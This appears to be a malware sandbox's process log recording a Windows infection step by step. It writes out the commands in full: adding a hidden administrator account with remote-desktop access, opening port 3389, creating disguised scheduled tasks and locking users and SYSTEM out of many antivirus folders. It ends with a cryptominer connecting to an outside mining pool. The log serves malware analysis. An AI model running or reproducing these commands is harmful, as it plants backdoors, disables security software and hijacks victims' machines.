C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 user "john" "12345" /add

PID:4972

C:\Windows\SysWOW64\chcp.com

chcp 1251

PID:4916

C:\Windows\SysWOW64\net.exe

net localgroup "Администраторы" "John" /add

PID:4832

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Администраторы" "John" /add

PID:1008

C:\Windows\SysWOW64\net.exe

net localgroup "Administratorzy" "John" /add

PID:2720

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add

PID:5072

C:\Windows\SysWOW64\net.exe

net localgroup "Administrators" John /add

PID:4820

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administrators" John /add

PID:4396

C:\Windows\SysWOW64\net.exe

net localgroup "Administradores" John /add

PID:4548

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Administradores" John /add

PID:4484

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного рабочего стола" John /add

PID:4624

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add

PID:4564

C:\Windows\SysWOW64\net.exe

net localgroup "Пользователи удаленного управления" John /add

PID:3520

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add

PID:4556

C:\Windows\SysWOW64\net.exe

net localgroup "Remote Desktop Users" John /add

PID:4952

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add

PID:2368

C:\Windows\SysWOW64\net.exe

net localgroup "Usuarios de escritorio remoto" John /add

PID:3872

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add

PID:1520

C:\Windows\SysWOW64\net.exe

net localgroup "Uzytkownicy pulpitu zdalnego" John /add

PID:4172

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add

PID:4928

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -i -o

Executes dropped EXE
Modifies WinLogon
Drops file in Program Files directory
Suspicious use of AdjustPrivilegeToken

PID:4844

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow

PID:4336

C:\rdp\RDPWInst.exe

"RDPWInst.exe" -w

Executes dropped EXE

PID:4772

C:\Windows\SysWOW64\reg.exe

reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f

PID:1528

C:\Windows\SysWOW64\net.exe

net accounts /maxpwage:unlimited

PID:4052

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 accounts /maxpwage:unlimited

PID:4780

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper\*.*"

Views/modifies file attributes

PID:4140

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\Program Files\RDP Wrapper"

Views/modifies file attributes

PID:4224

C:\Windows\SysWOW64\attrib.exe

attrib +s +h "C:\rdp"

Views/modifies file attributes

PID:4208

C:\Windows\SysWOW64\timeout.exe

timeout 2

Delays execution with timeout.exe

PID:4176

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat

Drops file in Drivers directory

PID:1844

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

Creates scheduled task(s)

PID:1524

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

Creates scheduled task(s)

PID:4980

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST

Creates scheduled task(s)

PID:4824

C:\ProgramData\WindowsTask\update.exe

C:\ProgramData\WindowsTask\update.exe

Executes dropped EXE
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx

PID:2224

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST

Creates scheduled task(s)

PID:2176

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST

Creates scheduled task(s)

PID:3940

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST

Creates scheduled task(s)

PID:3160

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST

Creates scheduled task(s)

PID:3224

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appidsvc

Suspicious use of WriteProcessMemory

PID:1508

C:\Windows\SysWOW64\sc.exe

sc start appidsvc

PID:2164

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start appmgmt

Suspicious use of WriteProcessMemory

PID:4016

C:\Windows\SysWOW64\sc.exe

sc start appmgmt

PID:1968

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto

Suspicious use of WriteProcessMemory

PID:1188

C:\Windows\SysWOW64\sc.exe

sc config appidsvc start= auto

PID:2528

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto

PID:3356

C:\Windows\SysWOW64\sc.exe

sc config appmgmt start= auto

PID:4032

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete swprv

PID:3916

C:\Windows\SysWOW64\sc.exe

sc delete swprv

PID:396

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop mbamservice

PID:3860

C:\Windows\SysWOW64\sc.exe

sc stop mbamservice

PID:4008

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop bytefenceservice

PID:2564

C:\Windows\SysWOW64\sc.exe

sc stop bytefenceservice

PID:2956

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete bytefenceservice

PID:908

C:\Windows\SysWOW64\sc.exe

sc delete bytefenceservice

PID:2148

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete mbamservice

PID:916

C:\Windows\SysWOW64\sc.exe

sc delete mbamservice

PID:3812

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc delete crmsvc

PID:2132

C:\Windows\SysWOW64\sc.exe

sc delete crmsvc

PID:3824

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on

PID:1372

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

PID:2196

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

PID:2236

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN

PID:2652

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

PID:2676

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN

PID:388

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

PID:1836

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN

PID:3084

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

PID:744

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN

PID:4108

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)

PID:4128

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4220

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

PID:4144

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:4228

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)

PID:4260

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4448

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

PID:4272

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:4392

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)

PID:4292

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4404

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

PID:4428

C:\Windows\SysWOW64\icacls.exe

icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:4488

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)

PID:4508

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4580

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

PID:4616

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)

Modifies file permissions

PID:4720

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)

PID:4752

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4988

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

PID:4764

C:\Windows\SysWOW64\icacls.exe

icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:4976

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)

PID:4784

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:5056

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

PID:4860

C:\Windows\SysWOW64\icacls.exe

icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)

Modifies file permissions

PID:5088

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)

PID:4876

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny Admin:(F)

Modifies file permissions

PID:5076

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)

PID:5000

C:\Windows\SysWOW64\icacls.exe

icacls c:\programdata\Malwarebytes /deny System:(F)

Modifies file permissions

PID:4132

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)

PID:5100

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny Admin:(F)

Modifies file permissions

PID:4156

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)

PID:4256

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\MB3Install /deny System:(F)

Modifies file permissions

PID:4384

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)

PID:4288

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4356

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

PID:4340

C:\Windows\SysWOW64\icacls.exe

icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)

Modifies file permissions

PID:4388

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)

PID:4360

C:\Windows\SysWOW64\icacls.exe

icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4480

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)

PID:4584

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4640

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)

PID:4732

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4680

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

PID:4600

C:\Windows\SysWOW64\icacls.exe

icacls C:\KVRT_Data /deny system:(OI)(CI)(F)

Modifies file permissions

PID:4652

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)

PID:3844

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:3856

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)

PID:2928

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4760

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)

PID:3124

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4064

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)

PID:1388

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:3868

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)

PID:5008

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:208

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)

PID:4888

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4892

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)

PID:4816

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:5080

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)

PID:4964

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4212

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)

PID:4896

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:5052

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)

PID:4252

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4420

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)

PID:4312

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4148

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)

PID:4452

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4368

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)

PID:4456

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4468

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

PID:4592

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4704

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:4628

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:4744

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)

PID:4104

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4540

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

PID:2220

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:860

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

PID:912

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:348

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:2844

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:4604

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)

PID:5032

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4992

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

PID:4836

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:4812

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)

PID:4160

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4864

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)

PID:5048

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4244

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)

PID:5104

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4348

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)

PID:4464

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4572

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)

PID:4644

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4660

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)

PID:4124

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4668

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)

PID:4676

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:2128

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)

PID:588

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4872

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)

PID:4912

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:5112

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

PID:2572

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:4808

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)

PID:5096

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4300

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

PID:4416

C:\Windows\SysWOW64\icacls.exe

icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)

Modifies file permissions

PID:4688

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)

PID:4460

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)

Modifies file permissions

PID:4656

C:\Programdata\Install\utorrent.exe

C:\Programdata\Install\utorrent.exe

Executes dropped EXE
Drops file in Program Files directory
NTFS ADS

PID:4960

C:\ProgramData\WindowsTask\azur.exe

C:\ProgramData\WindowsTask\azur.exe

Executes dropped EXE
Loads dropped DLL
Checks processor information in registry

PID:4788

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"

PID:3760

C:\Windows\SysWOW64\timeout.exe

C:\Windows\system32\timeout.exe 3

Delays execution with timeout.exe

PID:756

C:\ProgramData\WindowsTask\system.exe

C:\ProgramData\WindowsTask\system.exe

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken

PID:4200

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\selfDel.bat" "

PID:2204

C:\ProgramData\RDPWinst.exe

C:\ProgramData\RDPWinst.exe -u

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken

PID:4920

C:\ProgramData\RealtekHD\taskhost.exe

C:\ProgramData\RealtekHD\taskhost.exe

Executes dropped EXE

PID:4648

C:\ProgramData\RealtekHD\taskhostw.exe

C:\ProgramData\RealtekHD\taskhostw.exe

Executes dropped EXE

PID:1852

C:\ProgramData\Windows\rutserv.exe

C:\ProgramData\Windows\rutserv.exe

Executes dropped EXE
Drops file in System32 directory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx

PID:3152

C:\Programdata\RealtekHD\taskhost.exe

C:\Programdata\RealtekHD\taskhost.exe

Executes dropped EXE
Drops file in System32 directory
Suspicious behavior: GetForegroundWindowSpam

PID:400

C:\Programdata\WindowsTask\winlogon.exe

C:\Programdata\WindowsTask\winlogon.exe

Executes dropped EXE

PID:4248

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C schtasks /query /fo list

PID:640

C:\Windows\SysWOW64\schtasks.exe

schtasks /query /fo list

PID:3472

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ipconfig /flushdns

PID:5020

C:\Windows\system32\ipconfig.exe

ipconfig /flushdns

Gathers network information

PID:4968

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c gpupdate /force

PID:5004

C:\Windows\system32\gpupdate.exe

gpupdate /force

PID:4776

C:\ProgramData\WindowsTask\audiodg.exe

C:\ProgramData\WindowsTask\audiodg.exe

Executes dropped EXE

PID:3184

C:\ProgramData\WindowsTask\MicrosoftHost.exe

C:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://loders.xyz:3333 -u CPU --donate-level=1 -k -t1

Executes dropped EXE
Suspicious use of AdjustPrivilegeToken

PID:4332

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s TermService

PID:4756

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

PID:4772

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -s TermService

Suspicious use of AdjustPrivilegeToken

PID:4536

C:\Programdata\RealtekHD\taskhostw.exe

C:\Programdata\RealtekHD\taskhostw.exe

